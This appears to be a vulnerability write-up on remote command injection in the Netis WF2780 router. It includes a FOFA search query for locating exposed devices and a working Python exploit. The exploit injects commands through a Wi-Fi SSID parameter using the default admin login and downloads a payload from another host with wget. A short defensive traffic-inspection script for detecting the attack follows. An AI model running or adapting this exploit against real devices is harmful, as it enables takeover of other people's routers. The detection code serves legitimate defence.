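Disclaimer: This article is a set of shared study notes, provided for technical learning and reference only. Do not use it for illegal purposes. Any direct or indirect consequences or losses caused by any individual or organization using the information provided here are the sole responsibility of the user and have nothing to do with this platform or the publisher.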

Vulnerability name

Netis WF2780 remote command execution vulnerability

Affected versions

Netis WF2780 v2.1.40144

https://www.netis-systems.com/Suppory/de_details/id/1/de/189.html

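Vulnerability description

Netis is a manufacturer specializing in network communication equipment. Its products include routers, switches, wireless access points and network adapters. Netis WF2780 v2.1.40144 has a remote command injection vulnerability in the function igd_wps_set in the file bin/cgitest.cgi, which can lead to the device being remotely controlled.

FOFA search query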

title='AP setup' && header='netis'

PoC

The contents of the Python PoC file are as follows:


#!/usr/bin/env python3

import urllib.parse
import socket 


def send_cmd(ip, port, cmd):
    cmd = "\";"+cmd+";\""
    #print(f"cmd:{cmd}")
    body = "wps_set_5g=ap&wps_mode5g=cpin&wps_ap_ssid5g=" + urllib.parse.quote(cmd)
    request = "POST /cgi-bin-igd/netcore_set.cgi HTTP/1.1\r\n"
    request += f"Host: {ip}\r\n"
    request += "Content-Length: {}\r\n".format(len(body))
    request += "Authorization: Basic YWRtaW46YWRtaW4=\r\n"
    request += "Cache-Control: no-cache\r\n"
    request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\r\n"
    request += "content-type: application/x-www-form-urlencoded\r\n"
    request += f"Origin: http://{ip}\r\n"
    request += f"Referer: http://{ip}/index.htm\r\n"
    request += "Accept-Encoding: gzip, deflate\r\n"
    request += "Accept-Language: zh-CN,zh;q=0.9\r\n"
    request += "Connection: close\r\n\r\n"
    request += body
    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    c.settimeout(8)
    c.connect((ip,port))
    c.send(request.encode())
    c.recv(1024)
    #print(c.recv(1024))

def main(ip, port, cmd):
    for i in range(len(cmd)):
        if i == 0:
            _cmd = f"echo \'{cmd[i]}\\c\' > /tmp/s.sh"
        else:
            _cmd = f"echo \'{cmd[i]}\\c\' >> /tmp/s.sh"
        send_cmd(ip, port, _cmd)
    
    send_cmd(ip, port, "chmod 777 /tmp/s.sh")
    send_cmd(ip, port, "sh /tmp/s.sh")
    


if __name__ == "__main__":
    main("192.168.1.1", 80, "cd /tmp;wget http://192.168.1.2:8888/a")

Remediation

Upgrade to the latest version.
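
For devices that cannot be upgraded immediately, the request shape sent by the PoC above can be flagged at a proxy or in captured traffic. The following is an added example, not part of the original notes or of any Netis code: it checks POSTs to /cgi-bin-igd/netcore_set.cgi for shell metacharacters in wps_ap_ssid5g and for the admin:admin Basic credential the PoC uses. The function name inspect_request, the metacharacter set and both sample requests are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/cgi-bin-igd/netcore_set.cgi"  # endpoint the PoC posts to
PARAM = "wps_ap_ssid5g"                       # parameter the PoC injects into
# Assumption: shell-special characters that a legitimate SSID should not need.
SHELL_META = re.compile(r"[;&|`$<>\"'\\\n]")
DEFAULT_CREDS = {"admin:admin"}               # decoded value of the PoC's Basic header

def inspect_request(raw: bytes) -> list:
    """Return findings for one raw HTTP request; an empty list means clean."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    try:
        method, target, _ = lines[0].split(" ", 2)
    except ValueError:
        return ["malformed request line"]
    if method != "POST" or urlsplit(target).path != TARGET_PATH:
        return []
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    findings = []
    # parse_qs URL-decodes, so an encoded %22%3B is checked in decoded form.
    params = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    for value in params.get(PARAM, []):
        if SHELL_META.search(value):
            findings.append(f"shell metacharacter in {PARAM}: {value!r}")
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            creds = base64.b64decode(auth[6:], validate=True).decode("latin-1")
        except ValueError:
            creds = ""
        if creds in DEFAULT_CREDS:
            findings.append("default admin:admin credential in use")
    return findings

# Constructed samples: a benign WPS change and a quote-breaking SSID value.
BENIGN = (b"POST /cgi-bin-igd/netcore_set.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\n"
          b"Authorization: Basic b3BzOnN0cm9uZy1wdw==\r\n\r\n"
          b"wps_set_5g=ap&wps_mode5g=cpin&wps_ap_ssid5g=Office-5G")
SUSPECT = (b"POST /cgi-bin-igd/netcore_set.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\n"
           b"Authorization: Basic YWRtaW46YWRtaW4=\r\n\r\n"
           b"wps_set_5g=ap&wps_mode5g=cpin&wps_ap_ssid5g=%22%3BCMD%3B%22")
```

Calling inspect_request(SUSPECT) returns two findings and inspect_request(BENIGN) returns an empty list; the default-credential finding is worth alerting on by itself, since the PoC depends on that login being accepted.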